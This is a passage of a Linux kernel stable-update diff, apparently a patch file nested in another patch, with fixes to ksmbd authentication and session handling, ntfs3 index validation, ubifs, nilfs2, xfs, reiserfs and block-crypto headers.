+-		spin_unlock(&sbi->iostat_lock);
++		spin_unlock_irq(&sbi->iostat_lock);
+ 		return count;
+ 	}
+ #endif
+diff --git a/fs/jbd2/transaction.c b/fs/jbd2/transaction.c
+index 15de1385012eb..18611241f4513 100644
+--- a/fs/jbd2/transaction.c
++++ b/fs/jbd2/transaction.c
+@@ -2387,6 +2387,9 @@ static int journal_unmap_buffer(journal_t *journal, struct buffer_head *bh,
+ 			spin_unlock(&jh->b_state_lock);
+ 			write_unlock(&journal->j_state_lock);
+ 			jbd2_journal_put_journal_head(jh);
++			/* Already zapped buffer? Nothing to do... */
++			if (!bh->b_bdev)
++				return 0;
+ 			return -EBUSY;
+ 		}
+ 		/*
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+index cead696b656a8..df8fb076f6f14 100644
+--- a/fs/ksmbd/auth.c
++++ b/fs/ksmbd/auth.c
+@@ -221,22 +221,22 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ {
+ 	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
+ 	char ntlmv2_rsp[CIFS_HMAC_MD5_HASH_SIZE];
+-	struct ksmbd_crypto_ctx *ctx;
++	struct ksmbd_crypto_ctx *ctx = NULL;
+ 	char *construct = NULL;
+ 	int rc, len;
+ 
+-	ctx = ksmbd_crypto_ctx_find_hmacmd5();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
+-		return -ENOMEM;
+-	}
+-
+ 	rc = calc_ntlmv2_hash(conn, sess, ntlmv2_hash, domain_name);
+ 	if (rc) {
+ 		ksmbd_debug(AUTH, "could not get v2 hash rc %d\n", rc);
+ 		goto out;
+ 	}
+ 
++	ctx = ksmbd_crypto_ctx_find_hmacmd5();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
+ 	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
+ 				 ntlmv2_hash,
+ 				 CIFS_HMAC_MD5_HASH_SIZE);
+@@ -272,6 +272,8 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
+ 		goto out;
+ 	}
++	ksmbd_release_crypto_ctx(ctx);
++	ctx = NULL;
+ 
+ 	rc = ksmbd_gen_sess_key(sess, ntlmv2_hash, ntlmv2_rsp);
+ 	if (rc) {
+@@ -282,7 +284,8 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 	if (memcmp(ntlmv2->ntlmv2_hash, ntlmv2_rsp, CIFS_HMAC_MD5_HASH_SIZE) != 0)
+ 		rc = -EINVAL;
+ out:
+-	ksmbd_release_crypto_ctx(ctx);
++	if (ctx)
++		ksmbd_release_crypto_ctx(ctx);
+ 	kfree(construct);
+ 	return rc;
+ }
+diff --git a/fs/ksmbd/mgmt/tree_connect.c b/fs/ksmbd/mgmt/tree_connect.c
+index 8ce17b3fb8dad..f19de20c2960c 100644
+--- a/fs/ksmbd/mgmt/tree_connect.c
++++ b/fs/ksmbd/mgmt/tree_connect.c
+@@ -109,7 +109,15 @@ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+ struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+ 						  unsigned int id)
+ {
+-	return xa_load(&sess->tree_conns, id);
++	struct ksmbd_tree_connect *tcon;
++
++	tcon = xa_load(&sess->tree_conns, id);
++	if (tcon) {
++		if (test_bit(TREE_CONN_EXPIRE, &tcon->status))
++			tcon = NULL;
++	}
++
++	return tcon;
+ }
+ 
+ struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+diff --git a/fs/ksmbd/mgmt/tree_connect.h b/fs/ksmbd/mgmt/tree_connect.h
+index 0f97ddc1e39c0..700df36cf3e30 100644
+--- a/fs/ksmbd/mgmt/tree_connect.h
++++ b/fs/ksmbd/mgmt/tree_connect.h
+@@ -14,6 +14,8 @@ struct ksmbd_share_config;
+ struct ksmbd_user;
+ struct ksmbd_conn;
+ 
++#define TREE_CONN_EXPIRE		1
++
+ struct ksmbd_tree_connect {
+ 	int				id;
+ 
+@@ -25,6 +27,7 @@ struct ksmbd_tree_connect {
+ 
+ 	int				maximal_access;
+ 	bool				posix_extensions;
++	unsigned long			status;
+ };
+ 
+ struct ksmbd_tree_conn_status {
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index 651d1d01234be..8c2bc513445c3 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -614,6 +614,7 @@ err_unregister:
+ static void __exit ksmbd_server_exit(void)
+ {
+ 	ksmbd_server_shutdown();
++	rcu_barrier();
+ 	ksmbd_release_inode_hash();
+ }
+ 
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 5de7b41d64044..acd66fb40c5f0 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -1456,7 +1456,7 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 		 * Reuse session if anonymous try to connect
+ 		 * on reauthetication.
+ 		 */
+-		if (ksmbd_anonymous_user(user)) {
++		if (conn->binding == false && ksmbd_anonymous_user(user)) {
+ 			ksmbd_free_user(user);
+ 			return 0;
+ 		}
+@@ -1470,7 +1470,7 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 		sess->user = user;
+ 	}
+ 
+-	if (user_guest(sess->user)) {
++	if (conn->binding == false && user_guest(sess->user)) {
+ 		rsp->SessionFlags = SMB2_SESSION_FLAG_IS_GUEST_LE;
+ 	} else {
+ 		struct authenticate_message *authblob;
+@@ -1713,6 +1713,11 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			goto out_err;
+ 		}
+ 
++		if (user_guest(sess->user)) {
++			rc = -EOPNOTSUPP;
++			goto out_err;
++		}
++
+ 		conn->binding = true;
+ 	} else if ((conn->dialect < SMB30_PROT_ID ||
+ 		    server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
+@@ -1799,6 +1804,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				}
+ 				kfree(sess->Preauth_HashValue);
+ 				sess->Preauth_HashValue = NULL;
++			} else {
++				pr_info_ratelimited("Unknown NTLMSSP message type : 0x%x\n",
++						le32_to_cpu(negblob->MessageType));
++				rc = -EINVAL;
+ 			}
+ 		} else {
+ 			/* TODO: need one more negotiation */
+@@ -1821,6 +1830,8 @@ out_err:
+ 		rsp->hdr.Status = STATUS_NETWORK_SESSION_EXPIRED;
+ 	else if (rc == -ENOMEM)
+ 		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++	else if (rc == -EOPNOTSUPP)
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+ 	else if (rc)
+ 		rsp->hdr.Status = STATUS_LOGON_FAILURE;
+ 
+@@ -2053,11 +2064,12 @@ int smb2_tree_disconnect(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "request\n");
+ 
+-	if (!tcon) {
++	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
+ 		struct smb2_tree_disconnect_req *req =
+ 			smb2_get_msg(work->request_buf);
+ 
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
++
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+ 		smb2_set_err_rsp(work);
+ 		return 0;
+@@ -4912,6 +4924,9 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 	int rc = 0, len;
+ 	int fs_infoclass_size = 0;
+ 
++	if (!share->path)
++		return -EIO;
++
+ 	rc = kern_path(share->path, LOOKUP_NO_SYMLINKS, &path);
+ 	if (rc) {
+ 		pr_err("cannot create vfs path\n");
+diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
+index 03087ef1c7b4a..5b49e5365bb30 100644
+--- a/fs/nfs/nfs4state.c
++++ b/fs/nfs/nfs4state.c
+@@ -67,6 +67,8 @@
+ 
+ #define OPENOWNER_POOL_SIZE	8
+ 
++static void nfs4_state_start_reclaim_reboot(struct nfs_client *clp);
++
+ const nfs4_stateid zero_stateid = {
+ 	{ .data = { 0 } },
+ 	.type = NFS4_SPECIAL_STATEID_TYPE,
+@@ -330,6 +332,8 @@ do_confirm:
+ 	status = nfs4_proc_create_session(clp, cred);
+ 	if (status != 0)
+ 		goto out;
++	if (!(clp->cl_exchange_flags & EXCHGID4_FLAG_CONFIRMED_R))
++		nfs4_state_start_reclaim_reboot(clp);
+ 	nfs41_finish_session_reset(clp);
+ 	nfs_mark_client_ready(clp, NFS_CS_READY);
+ out:
+diff --git a/fs/nilfs2/bmap.c b/fs/nilfs2/bmap.c
+index 798a2c1b38c6c..7a8f166f2c8d8 100644
+--- a/fs/nilfs2/bmap.c
++++ b/fs/nilfs2/bmap.c
+@@ -67,20 +67,28 @@ int nilfs_bmap_lookup_at_level(struct nilfs_bmap *bmap, __u64 key, int level,
+ 
+ 	down_read(&bmap->b_sem);
+ 	ret = bmap->b_ops->bop_lookup(bmap, key, level, ptrp);
+-	if (ret < 0) {
+-		ret = nilfs_bmap_convert_error(bmap, __func__, ret);
++	if (ret < 0)
+ 		goto out;
+-	}
++
+ 	if (NILFS_BMAP_USE_VBN(bmap)) {
+ 		ret = nilfs_dat_translate(nilfs_bmap_get_dat(bmap), *ptrp,
+ 					  &blocknr);
+ 		if (!ret)
+ 			*ptrp = blocknr;
++		else if (ret == -ENOENT) {
++			/*
++			 * If there was no valid entry in DAT for the block
++			 * address obtained by b_ops->bop_lookup, then pass
++			 * internal code -EINVAL to nilfs_bmap_convert_error
++			 * to treat it as metadata corruption.
++			 */
++			ret = -EINVAL;
++		}
+ 	}
+ 
+  out:
+ 	up_read(&bmap->b_sem);
+-	return ret;
++	return nilfs_bmap_convert_error(bmap, __func__, ret);
+ }
+ 
+ int nilfs_bmap_lookup_contig(struct nilfs_bmap *bmap, __u64 key, __u64 *ptrp,
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 101f2ce6ba376..209e46431a5ea 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2039,6 +2039,9 @@ static int nilfs_segctor_do_construct(struct nilfs_sc_info *sci, int mode)
+ 	struct the_nilfs *nilfs = sci->sc_super->s_fs_info;
+ 	int err;
+ 
++	if (sb_rdonly(sci->sc_super))
++		return -EROFS;
++
+ 	nilfs_sc_cstage_set(sci, NILFS_ST_INIT);
+ 	sci->sc_cno = nilfs->ns_cno;
+ 
+@@ -2722,7 +2725,7 @@ static void nilfs_segctor_write_out(struct nilfs_sc_info *sci)
+ 
+ 		flush_work(&sci->sc_iput_work);
+ 
+-	} while (ret && retrycount-- > 0);
++	} while (ret && ret != -EROFS && retrycount-- > 0);
+ }
+ 
+ /**
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index c662d2a519072..00faf41d8f97d 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -2575,7 +2575,7 @@ static int read_next_log_rec(struct ntfs_log *log, struct lcb *lcb, u64 *lsn)
+ 	return find_log_rec(log, *lsn, lcb);
+ }
+ 
+-static inline bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes)
++bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes)
+ {
+ 	__le16 mask;
+ 	u32 min_de, de_off, used, total;
+@@ -4258,6 +4258,10 @@ check_attribute_names:
+ 	rec_len -= t32;
+ 
+ 	attr_names = kmemdup(Add2Ptr(lrh, t32), rec_len, GFP_NOFS);
++	if (!attr_names) {
++		err = -ENOMEM;
++		goto out;
++	}
+ 
+ 	lcb_put(lcb);
+ 	lcb = NULL;
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index c27b4fe575136..98491abf95b9d 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -679,9 +679,13 @@ static struct NTFS_DE *hdr_find_e(const struct ntfs_index *indx,
+ 	u32 e_size, e_key_len;
+ 	u32 end = le32_to_cpu(hdr->used);
+ 	u32 off = le32_to_cpu(hdr->de_off);
++	u32 total = le32_to_cpu(hdr->total);
+ 	u16 offs[128];
+ 
+ fill_table:
++	if (end > total)
++		return NULL;
++
+ 	if (off + sizeof(struct NTFS_DE) > end)
+ 		return NULL;
+ 
+@@ -798,6 +802,10 @@ static inline struct NTFS_DE *hdr_delete_de(struct INDEX_HDR *hdr,
+ 	u32 off = PtrOffset(hdr, re);
+ 	int bytes = used - (off + esize);
+ 
++	/* check INDEX_HDR valid before using INDEX_HDR */
++	if (!check_index_header(hdr, le32_to_cpu(hdr->total)))
++		return NULL;
++
+ 	if (off >= used || esize < sizeof(struct NTFS_DE) ||
+ 	    bytes < sizeof(struct NTFS_DE))
+ 		return NULL;
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index 22152300e60ca..57988fedd1847 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -257,7 +257,6 @@ next_attr:
+ 			goto out;
+ 
+ 		root = Add2Ptr(attr, roff);
+-		is_root = true;
+ 
+ 		if (attr->name_len != ARRAY_SIZE(I30_NAME) ||
+ 		    memcmp(attr_name(attr), I30_NAME, sizeof(I30_NAME)))
+@@ -270,6 +269,7 @@ next_attr:
+ 		if (!is_dir)
+ 			goto next_attr;
+ 
++		is_root = true;
+ 		ni->ni_flags |= NI_FLAG_DIR;
+ 
+ 		err = indx_init(&ni->dir, sbi, attr, INDEX_MUTEX_I30);
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 2c791222c4e27..c5c022fef4e0b 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -574,6 +574,7 @@ int ni_rename(struct ntfs_inode *dir_ni, struct ntfs_inode *new_dir_ni,
+ bool ni_is_dirty(struct inode *inode);
+ 
+ /* Globals from fslog.c */
++bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes);
+ int log_replay(struct ntfs_inode *ni, bool *initialized);
+ 
+ /* Globals from fsntfs.c */
+diff --git a/fs/pstore/pmsg.c b/fs/pstore/pmsg.c
+index 18cf94b597e05..d8542ec2f38c6 100644
+--- a/fs/pstore/pmsg.c
++++ b/fs/pstore/pmsg.c
+@@ -7,10 +7,9 @@
+ #include <linux/device.h>
+ #include <linux/fs.h>
+ #include <linux/uaccess.h>
+-#include <linux/rtmutex.h>
+ #include "internal.h"
+ 
+-static DEFINE_RT_MUTEX(pmsg_lock);
++static DEFINE_MUTEX(pmsg_lock);
+ 
+ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 			  size_t count, loff_t *ppos)
+@@ -29,9 +28,9 @@ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 	if (!access_ok(buf, count))
+ 		return -EFAULT;
+ 
+-	rt_mutex_lock(&pmsg_lock);
++	mutex_lock(&pmsg_lock);
+ 	ret = psinfo->write_user(&record, buf);
+-	rt_mutex_unlock(&pmsg_lock);
++	mutex_unlock(&pmsg_lock);
+ 	return ret ? ret : count;
+ }
+ 
+diff --git a/fs/reiserfs/xattr_security.c b/fs/reiserfs/xattr_security.c
+index 857a65b057264..157ebfe2456bb 100644
+--- a/fs/reiserfs/xattr_security.c
++++ b/fs/reiserfs/xattr_security.c
+@@ -82,11 +82,15 @@ int reiserfs_security_write(struct reiserfs_transaction_handle *th,
+ 			    struct inode *inode,
+ 			    struct reiserfs_security_handle *sec)
+ {
++	char xattr_name[XATTR_NAME_MAX + 1] = XATTR_SECURITY_PREFIX;
+ 	int error;
+-	if (strlen(sec->name) < sizeof(XATTR_SECURITY_PREFIX))
++
++	if (XATTR_SECURITY_PREFIX_LEN + strlen(sec->name) > XATTR_NAME_MAX)
+ 		return -EINVAL;
+ 
+-	error = reiserfs_xattr_set_handle(th, inode, sec->name, sec->value,
++	strlcat(xattr_name, sec->name, sizeof(xattr_name));
++
++	error = reiserfs_xattr_set_handle(th, inode, xattr_name, sec->value,
+ 					  sec->length, XATTR_CREATE);
+ 	if (error == -ENODATA || error == -EOPNOTSUPP)
+ 		error = 0;
+diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
+index 5e6bcce94e641..66ba57a139d2a 100644
+--- a/fs/ubifs/dir.c
++++ b/fs/ubifs/dir.c
+@@ -358,7 +358,6 @@ static struct inode *create_whiteout(struct inode *dir, struct dentry *dentry)
+ 	umode_t mode = S_IFCHR | WHITEOUT_MODE;
+ 	struct inode *inode;
+ 	struct ubifs_info *c = dir->i_sb->s_fs_info;
+-	struct fscrypt_name nm;
+ 
+ 	/*
+ 	 * Create an inode('nlink = 1') for whiteout without updating journal,
+@@ -369,10 +368,6 @@ static struct inode *create_whiteout(struct inode *dir, struct dentry *dentry)
+ 	dbg_gen("dent '%pd', mode %#hx in dir ino %lu",
+ 		dentry, mode, dir->i_ino);
+ 
+-	err = fscrypt_setup_filename(dir, &dentry->d_name, 0, &nm);
+-	if (err)
+-		return ERR_PTR(err);
+-
+ 	inode = ubifs_new_inode(c, dir, mode, false);
+ 	if (IS_ERR(inode)) {
+ 		err = PTR_ERR(inode);
+@@ -395,7 +390,6 @@ out_inode:
+ 	make_bad_inode(inode);
+ 	iput(inode);
+ out_free:
+-	fscrypt_free_filename(&nm);
+ 	ubifs_err(c, "cannot create whiteout file, error %d", err);
+ 	return ERR_PTR(err);
+ }
+@@ -492,6 +486,7 @@ static int ubifs_tmpfile(struct user_namespace *mnt_userns, struct inode *dir,
+ 	unlock_2_inodes(dir, inode);
+ 
+ 	ubifs_release_budget(c, &req);
++	fscrypt_free_filename(&nm);
+ 
+ 	return finish_open_simple(file, 0);
+ 
+diff --git a/fs/ubifs/tnc.c b/fs/ubifs/tnc.c
+index 2469f72eeaabb..6b7d95b65f4b6 100644
+--- a/fs/ubifs/tnc.c
++++ b/fs/ubifs/tnc.c
+@@ -44,6 +44,33 @@ enum {
+ 	NOT_ON_MEDIA = 3,
+ };
+ 
++static void do_insert_old_idx(struct ubifs_info *c,
++			      struct ubifs_old_idx *old_idx)
++{
++	struct ubifs_old_idx *o;
++	struct rb_node **p, *parent = NULL;
++
++	p = &c->old_idx.rb_node;
++	while (*p) {
++		parent = *p;
++		o = rb_entry(parent, struct ubifs_old_idx, rb);
++		if (old_idx->lnum < o->lnum)
++			p = &(*p)->rb_left;
++		else if (old_idx->lnum > o->lnum)
++			p = &(*p)->rb_right;
++		else if (old_idx->offs < o->offs)
++			p = &(*p)->rb_left;
++		else if (old_idx->offs > o->offs)
++			p = &(*p)->rb_right;
++		else {
++			ubifs_err(c, "old idx added twice!");
++			kfree(old_idx);
++		}
++	}
++	rb_link_node(&old_idx->rb, parent, p);
++	rb_insert_color(&old_idx->rb, &c->old_idx);
++}
++
+ /**
+  * insert_old_idx - record an index node obsoleted since the last commit start.
+  * @c: UBIFS file-system description object
+@@ -69,35 +96,15 @@ enum {
+  */
+ static int insert_old_idx(struct ubifs_info *c, int lnum, int offs)
+ {
+-	struct ubifs_old_idx *old_idx, *o;
+-	struct rb_node **p, *parent = NULL;
++	struct ubifs_old_idx *old_idx;
+ 
+ 	old_idx = kmalloc(sizeof(struct ubifs_old_idx), GFP_NOFS);
+ 	if (unlikely(!old_idx))
+ 		return -ENOMEM;
+ 	old_idx->lnum = lnum;
+ 	old_idx->offs = offs;
++	do_insert_old_idx(c, old_idx);
+ 
+-	p = &c->old_idx.rb_node;
+-	while (*p) {
+-		parent = *p;
+-		o = rb_entry(parent, struct ubifs_old_idx, rb);
+-		if (lnum < o->lnum)
+-			p = &(*p)->rb_left;
+-		else if (lnum > o->lnum)
+-			p = &(*p)->rb_right;
+-		else if (offs < o->offs)
+-			p = &(*p)->rb_left;
+-		else if (offs > o->offs)
+-			p = &(*p)->rb_right;
+-		else {
+-			ubifs_err(c, "old idx added twice!");
+-			kfree(old_idx);
+-			return 0;
+-		}
+-	}
+-	rb_link_node(&old_idx->rb, parent, p);
+-	rb_insert_color(&old_idx->rb, &c->old_idx);
+ 	return 0;
+ }
+ 
+@@ -199,23 +206,6 @@ static struct ubifs_znode *copy_znode(struct ubifs_info *c,
+ 	__set_bit(DIRTY_ZNODE, &zn->flags);
+ 	__clear_bit(COW_ZNODE, &zn->flags);
+ 
+-	ubifs_assert(c, !ubifs_zn_obsolete(znode));
+-	__set_bit(OBSOLETE_ZNODE, &znode->flags);
+-
+-	if (znode->level != 0) {
+-		int i;
+-		const int n = zn->child_cnt;
+-
+-		/* The children now have new parent */
+-		for (i = 0; i < n; i++) {
+-			struct ubifs_zbranch *zbr = &zn->zbranch[i];
+-
+-			if (zbr->znode)
+-				zbr->znode->parent = zn;
+-		}
+-	}
+-
+-	atomic_long_inc(&c->dirty_zn_cnt);
+ 	return zn;
+ }
+ 
+@@ -233,6 +223,42 @@ static int add_idx_dirt(struct ubifs_info *c, int lnum, int dirt)
+ 	return ubifs_add_dirt(c, lnum, dirt);
+ }
+ 
++/**
++ * replace_znode - replace old znode with new znode.
++ * @c: UBIFS file-system description object
++ * @new_zn: new znode
++ * @old_zn: old znode
++ * @zbr: the branch of parent znode
++ *
++ * Replace old znode with new znode in TNC.
++ */
++static void replace_znode(struct ubifs_info *c, struct ubifs_znode *new_zn,
++			  struct ubifs_znode *old_zn, struct ubifs_zbranch *zbr)
++{
++	ubifs_assert(c, !ubifs_zn_obsolete(old_zn));
++	__set_bit(OBSOLETE_ZNODE, &old_zn->flags);
++
++	if (old_zn->level != 0) {
++		int i;
++		const int n = new_zn->child_cnt;
++
++		/* The children now have new parent */
++		for (i = 0; i < n; i++) {
++			struct ubifs_zbranch *child = &new_zn->zbranch[i];
++
++			if (child->znode)
++				child->znode->parent = new_zn;
++		}
++	}
++
++	zbr->znode = new_zn;
++	zbr->lnum = 0;
++	zbr->offs = 0;
++	zbr->len = 0;
++
++	atomic_long_inc(&c->dirty_zn_cnt);
++}
++
+ /**
+  * dirty_cow_znode - ensure a znode is not being committed.
+  * @c: UBIFS file-system description object
+@@ -265,28 +291,32 @@ static struct ubifs_znode *dirty_cow_znode(struct ubifs_info *c,
+ 		return zn;
+ 
+ 	if (zbr->len) {
+-		err = insert_old_idx(c, zbr->lnum, zbr->offs);
+-		if (unlikely(err))
+-			/*
+-			 * Obsolete znodes will be freed by tnc_destroy_cnext()
+-			 * or free_obsolete_znodes(), copied up znodes should
+-			 * be added back to tnc and freed by
+-			 * ubifs_destroy_tnc_subtree().
+-			 */
++		struct ubifs_old_idx *old_idx;
++
++		old_idx = kmalloc(sizeof(struct ubifs_old_idx), GFP_NOFS);
++		if (unlikely(!old_idx)) {
++			err = -ENOMEM;
+ 			goto out;
++		}
++		old_idx->lnum = zbr->lnum;
++		old_idx->offs = zbr->offs;
++
+ 		err = add_idx_dirt(c, zbr->lnum, zbr->len);
+-	} else
+-		err = 0;
++		if (err) {
++			kfree(old_idx);
++			goto out;
++		}
+ 
+-out:
+-	zbr->znode = zn;
+-	zbr->lnum = 0;
+-	zbr->offs = 0;
+-	zbr->len = 0;
++		do_insert_old_idx(c, old_idx);
++	}
++
++	replace_znode(c, zn, znode, zbr);
+ 
+-	if (unlikely(err))
+-		return ERR_PTR(err);
+ 	return zn;
++
++out:
++	kfree(zn);
++	return ERR_PTR(err);
+ }
+ 
+ /**
+diff --git a/fs/xfs/libxfs/xfs_sb.c b/fs/xfs/libxfs/xfs_sb.c
+index a20cade590e9f..b6a584e044be0 100644
+--- a/fs/xfs/libxfs/xfs_sb.c
++++ b/fs/xfs/libxfs/xfs_sb.c
+@@ -72,7 +72,8 @@ xfs_sb_validate_v5_features(
+ }
+ 
+ /*
+- * We support all XFS versions newer than a v4 superblock with V2 directories.
++ * We current support XFS v5 formats with known features and v4 superblocks with
++ * at least V2 directories.
+  */
+ bool
+ xfs_sb_good_version(
+@@ -86,16 +87,16 @@ xfs_sb_good_version(
+ 	if (xfs_sb_is_v5(sbp))
+ 		return xfs_sb_validate_v5_features(sbp);
+ 
++	/* versions prior to v4 are not supported */
++	if (XFS_SB_VERSION_NUM(sbp) != XFS_SB_VERSION_4)
++		return false;
++
+ 	/* We must not have any unknown v4 feature bits set */
+ 	if ((sbp->sb_versionnum & ~XFS_SB_VERSION_OKBITS) ||
+ 	    ((sbp->sb_versionnum & XFS_SB_VERSION_MOREBITSBIT) &&
+ 	     (sbp->sb_features2 & ~XFS_SB_VERSION2_OKBITS)))
+ 		return false;
+ 
+-	/* versions prior to v4 are not supported */
+-	if (XFS_SB_VERSION_NUM(sbp) < XFS_SB_VERSION_4)
+-		return false;
+-
+ 	/* V4 filesystems need v2 directories and unwritten extents */
+ 	if (!(sbp->sb_versionnum & XFS_SB_VERSION_DIRV2BIT))
+ 		return false;
+diff --git a/include/asm-generic/io.h b/include/asm-generic/io.h
+index a68f8fbf423be..cde032f86856e 100644
+--- a/include/asm-generic/io.h
++++ b/include/asm-generic/io.h
+@@ -236,7 +236,7 @@ static inline u64 readq(const volatile void __iomem *addr)
+ 
+ 	log_read_mmio(64, addr, _THIS_IP_);
+ 	__io_br();
+-	val = __le64_to_cpu(__raw_readq(addr));
++	val = __le64_to_cpu((__le64 __force)__raw_readq(addr));
+ 	__io_ar(val);
+ 	log_post_read_mmio(val, 64, addr, _THIS_IP_);
+ 	return val;
+@@ -287,7 +287,7 @@ static inline void writeq(u64 value, volatile void __iomem *addr)
+ {
+ 	log_write_mmio(value, 64, addr, _THIS_IP_);
+ 	__io_bw();
+-	__raw_writeq(__cpu_to_le64(value), addr);
++	__raw_writeq((u64 __force)__cpu_to_le64(value), addr);
+ 	__io_aw();
+ 	log_post_write_mmio(value, 64, addr, _THIS_IP_);
+ }
+diff --git a/include/drm/i915_pciids.h b/include/drm/i915_pciids.h
+index 4a4c190f76984..8f648c32a9657 100644
+--- a/include/drm/i915_pciids.h
++++ b/include/drm/i915_pciids.h
+@@ -706,7 +706,6 @@
+ 	INTEL_VGA_DEVICE(0x5693, info), \
+ 	INTEL_VGA_DEVICE(0x5694, info), \
+ 	INTEL_VGA_DEVICE(0x5695, info), \
+-	INTEL_VGA_DEVICE(0x5698, info), \
+ 	INTEL_VGA_DEVICE(0x56A5, info), \
+ 	INTEL_VGA_DEVICE(0x56A6, info), \
+ 	INTEL_VGA_DEVICE(0x56B0, info), \
+diff --git a/include/linux/blk-crypto-profile.h b/include/linux/blk-crypto-profile.h
+index bbab65bd54288..e6802b69cdd64 100644
+--- a/include/linux/blk-crypto-profile.h
++++ b/include/linux/blk-crypto-profile.h
+@@ -138,18 +138,6 @@ int devm_blk_crypto_profile_init(struct device *dev,
+ 
+ unsigned int blk_crypto_keyslot_index(struct blk_crypto_keyslot *slot);
+ 
+-blk_status_t blk_crypto_get_keyslot(struct blk_crypto_profile *profile,
+-				    const struct blk_crypto_key *key,
+-				    struct blk_crypto_keyslot **slot_ptr);
+-
+-void blk_crypto_put_keyslot(struct blk_crypto_keyslot *slot);
+-
+-bool __blk_crypto_cfg_supported(struct blk_crypto_profile *profile,
+-				const struct blk_crypto_config *cfg);
+-
+-int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
+-			   const struct blk_crypto_key *key);
+-
+ void blk_crypto_reprogram_all_keys(struct blk_crypto_profile *profile);
+ 
+ void blk_crypto_profile_destroy(struct blk_crypto_profile *profile);
+diff --git a/include/linux/blk-crypto.h b/include/linux/blk-crypto.h
+index 69b24fe92cbf1..ad17eaa192fbb 100644
+--- a/include/linux/blk-crypto.h
++++ b/include/linux/blk-crypto.h
+@@ -71,9 +71,6 @@ struct bio_crypt_ctx {
+ #include <linux/blk_types.h>
+ #include <linux/blkdev.h>
+ 
+-struct request;
+-struct request_queue;
+-
+ #ifdef CONFIG_BLK_INLINE_ENCRYPTION
+ 
+ static inline bool bio_has_crypt_ctx(struct bio *bio)
+@@ -94,13 +91,15 @@ int blk_crypto_init_key(struct blk_crypto_key *blk_key, const u8 *raw_key,
+ 			unsigned int dun_bytes,
+ 			unsigned int data_unit_size);
+ 
+-int blk_crypto_start_using_key(const struct blk_crypto_key *key,
+-			       struct request_queue *q);
++int blk_crypto_start_using_key(struct block_device *bdev,
++			       const struct blk_crypto_key *key);
+ 
+-int blk_crypto_evict_key(struct request_queue *q,
+-			 const struct blk_crypto_key *key);
++void blk_crypto_evict_key(struct block_device *bdev,
++			  const struct blk_crypto_key *key);
+ 
+-bool blk_crypto_config_supported(struct request_queue *q,
++bool blk_crypto_config_supported_natively(struct block_device *bdev,
++					  const struct blk_crypto_config *cfg);
++bool blk_crypto_config_supported(struct block_device *bdev,
+ 				 const struct blk_crypto_config *cfg);
+ 
+ #else /* CONFIG_BLK_INLINE_ENCRYPTION */
+diff --git a/include/linux/mailbox/zynqmp-ipi-message.h b/include/linux/mailbox/zynqmp-ipi-message.h
+index 35ce84c8ca02c..31d8046d945e7 100644
+--- a/include/linux/mailbox/zynqmp-ipi-message.h
++++ b/include/linux/mailbox/zynqmp-ipi-message.h
+@@ -9,7 +9,7 @@
+  * @data: message payload
+  *
+  * This is the structure for data used in mbox_send_message
+- * the maximum length of data buffer is fixed to 12 bytes.
++ * the maximum length of data buffer is fixed to 32 bytes.
+  * Client is supposed to be aware of this.
+  */
+ struct zynqmp_ipi_message {
+diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h
+index e45bdec73baf1..097cbf84c1e05 100644
